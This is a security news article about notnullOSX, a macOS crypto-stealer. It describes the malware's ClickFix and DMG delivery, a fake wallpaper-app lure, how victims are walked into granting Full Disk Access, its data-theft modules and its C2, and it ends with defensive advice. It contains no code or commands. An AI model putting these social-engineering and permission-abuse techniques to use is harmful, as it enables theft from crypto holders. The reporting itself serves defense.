A new macOS info-stealer named notnullOSX has surfaced, targeting crypto holders with wallets above $10,000.
Written in Go, it uses two parallel attack paths — ClickFix social engineering and malicious DMG disk image files — to silently compromise Apple Mac systems.
The malware is highly targeted, with operators hand-picking each victim through an affiliate panel before launching an attack.
The story behind notnullOSX stretches back to 2022 and a developer known as 0xFFF, who first posted about a rough macOS stealer on underground forums.
After a dramatic exit in 2023 — triggered by a fabricated law enforcement tip reportedly set up by a rival — 0xFFF disappeared, leaving paying subscribers without refunds.
In August 2024, the same actor returned under a new alias, alh1mik, posted an apology, and began taking preorders for a new macOS stealer at $400 per month. By 2026, that offer had materialized.
Moonlock Lab researchers identified and recorded the first detections of notnullOSX on March 30, 2026, across three regions — Vietnam, Taiwan, and Spain.
Their telemetry confirmed how deliberately the malware had been constructed: before targeting anyone, operators must fill out a submission form that includes the victim’s social media profiles, wallet address, and correspondence history.
The minimum wallet threshold is set at $10,000, and submissions below that figure are automatically rejected.
The infection begins with a fake protected Google document, which shows an encryption error and urges the victim to take one of two actions — both leading to the same malware.
The first path uses ClickFix: the victim is told to open Terminal and paste a base64-encoded command, which silently fetches and executes a remote bash installer script.
The second delivers a malicious DMG disk image containing a README, an install script, and a Terminal shortcut, packaged to look entirely routine. In both cases, the victim unknowingly installs the malware without triggering a single security warning.
The distribution network goes further. A fake product page for a wallpaper app called WallSpace was set up at wallpapermacos[.]com, with polished screenshots and a free download button.
.webp)
A hijacked YouTube channel, dormant since 2015, promoted the fake app with a single video that accumulated 50,000 views in just two weeks — consistent with paid promotion or SEO manipulation.
Inside the Attack: TCC Bypass and Modular Data Theft
What makes notnullOSX particularly dangerous is how it turns macOS’s own permission system against its users.
Normally, Apple’s Transparency, Consent, and Control (TCC) framework triggers a pop-up every time an app tries to access protected data — messages, notes, browser cookies, and more. notnullOSX sidesteps this by walking victims into manually granting Full Disk Access in System Settings.
.webp)
That single permission covers every protected data category at once, with no further dialogs appearing.
The malware operates through a modular architecture, downloading separate binaries from its C2 server to handle each theft task.
Confirmed modules include iMessageGrab, AppleNotesGrab, CryptoWalletsGrab, BrowserGrab, TelegramGrab, CredsGrab, and ReplaceApp.
.webp)
ReplaceApp is especially alarming: it silently swaps a legitimate hardware wallet app like Ledger Live with a trojanized clone designed to intercept seed phrases at setup.
Even users relying on hardware wallets are at risk if the managing app on their Mac is replaced without any visible sign.
Beyond theft, notnullOSX holds a persistent WebSocket connection to a Firebase-hosted C2 server, sending regular heartbeats and waiting for remote commands — behavior far closer to a remote access trojan than a one-time stealer.
Moonlock Lab’s detection notes recommend that security teams block outbound connections to the known C2 domain, alert on Full Disk Access grants to unrecognized applications, and monitor /tmp for staged Mach-O binaries.
For Mac users and crypto holders, the advice is direct: never paste Terminal commands from a browser or document, treat any app requesting Full Disk Access during installation as suspicious, and check ~/Library/LaunchAgents/ for unfamiliar entries.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
